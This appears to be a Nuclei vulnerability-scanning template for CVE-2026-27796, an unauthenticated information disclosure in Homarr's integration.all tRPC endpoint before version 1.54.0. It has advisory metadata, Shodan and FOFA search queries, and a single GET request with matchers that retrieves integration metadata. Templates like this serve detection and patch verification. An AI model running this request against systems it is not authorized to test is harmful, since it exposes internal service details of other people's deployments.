Description
Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.
Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.
id: CVE-2026-27796
info:
name: Homarr < 1.54.0 - Information Disclosure
author: str4k3r
severity: medium
description: |
Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.
impact: |
Unauthenticated attackers can access sensitive integration metadata, potentially exposing internal service details.
remediation: |
Update to version 1.54.0 or later.
reference:
- https://github.com/homarr-labs/homarr/security/advisories/GHSA-m4vc-4prp-cvp7
- https://github.com/homarr-labs/homarr/commit/91fc5a5c747121475a50f2713d571ceb89e95257
- https://nvd.nist.gov/vuln/detail/CVE-2026-27796
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2026-27796
epss-score: 0.01154
epss-percentile: 0.65379
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
vendor: homarr-labs
product: homarr
fofa-query: title="Homarr"
shodan-query: http.title:"Homarr"
tags: cve,cve2026,homarr,exposure,unauth
http:
- method: GET
path:
- "{{BaseURL}}/api/trpc/integration.all"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"result":{"data":{"json":'
- '"kind":"'
condition: and
- type: word
part: body
words:
- "UNAUTHORIZED"
negative: true
# digest: 4a0a0047304502204637662e347713e06475dfb45ce8956f0089dcb4607d3d6e86381e92b5727fd1022100d60e5c0f3fc4275d6a2dd2b079b1f1fc14c3f442e3e913454ebb36edd22925e9:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.